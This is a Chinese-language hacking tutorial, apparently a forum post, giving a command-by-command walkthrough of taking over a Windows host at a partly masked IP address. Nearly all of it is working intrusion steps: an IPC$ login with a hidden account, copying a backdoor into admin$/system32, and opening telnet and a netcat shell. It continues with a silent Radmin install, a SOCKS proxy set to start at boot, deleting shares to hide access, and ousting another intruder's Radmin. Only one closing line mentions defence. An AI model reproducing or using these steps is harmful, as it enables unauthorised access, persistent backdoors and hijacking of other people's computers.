入侵技巧
到这里我们入侵告一段落
[ 建 立 IPC$ 连 接 ,也可以使用tftp上传 ,先和对方建立连接]
F:/hack>net use //211.217.50.xx/ipc$ "1111" /user:blueye$
[ 上 传 一 个 后 门 程 序 到 对 方 的 主 机 里]
F:/hack>copy d:/inject.exe //211.217.50.xx/admin$/system32
F:/hack>copy d:/tback.dll //211.217.50.xx/admin$/system32
然后运行后门程序,我们可以使用at命令。但是有的机器把at明令禁止了,建议直接开起telnet
使用opentelnet.exe 关闭开启的telnet使用resumetelnet //ip user password
如果忘记开共享可以使用脚本开启telnet来开共享,用法:
cscript telnet.vbe ip user password null port (null是验证方式)
F:/hack>opentenet //211.217.50.xx blueye$ 1111 1 4567
F:/hack>telnet 211.217.50.xx 4567
(省略)
连接并运行后门程序运行后门程序命令 根目录:inject.exe -run
(后门使用方法和安装都在zip文件里面包含了)
后门端口123456
F:/hack>nc 211.217.50.xx 123456
Welcome To WinEggDropShell Matrix Version
[Melody]
下面安装radmin,配置好的radmin客户端有4个文件。配置radmin客户端可参考相关文章。
radmin.reg
raddrv.dll
admdll.dll
r_server.exe
把这个4个文件copy c:/winnt/system32
在目录下面执行命令
c:/winnt/system32>r_server /s radmin.reg -----导入注册表
c:/winnt/system32>r_server /install /silence -----安装radmin.并且不显示托盘
c:/winnt/system32>net start r_server ----- 启动服务
安装sock代理
把sksockserver.exe copy c:/winnt/system32
c:/winnt/system32>sksockserver /install -----安装服务
c:/winnt/system32>sksockserver -config port 1234 ----端口定在1234 自己可以改
c:/winnt/system32>sksockserver -config starttype 2 ----开机自动启动
c:/winnt/system32>net start skserver ----启动服务
最后删除共享
net share ipc$ /del
net share admin$ /del
在安装radmin的时候你发现有人已经安装了。
看操作 (我输入的内容)
后门连接
F:/hack>nc 211.217.50.xx 123456
Welcome To WinEggDropShell Matrix Version
[Melody ]#(pslist)
[Melody ]#(pskill r_server)
[Melody ]#(shell)
c:/winnt/system32>(del r_server.exe)
c:/winnt/system32>(del admdll.dll)
c:/winnt/system32>(del raddrv.dll)
copy你自己的上去,然后安装
省事的办法直接导入注册表,然后重新输入安装命令运行,就可以了,只是在原来默认端口上面架上了密码。
这时,你就会有疑问了!为什么我输入导入注册表命令不管用呢?出现什么regedit不是可运行的程序之类的。
出现这样的情况最简单的解决办法telnet上去导入试试看,还可以先运行radmin 然后在radmin的dos下导入,也是可以的。
防御办法:
安装rpc补丁,使用防火墙过滤135,445,139等端口。
网友评论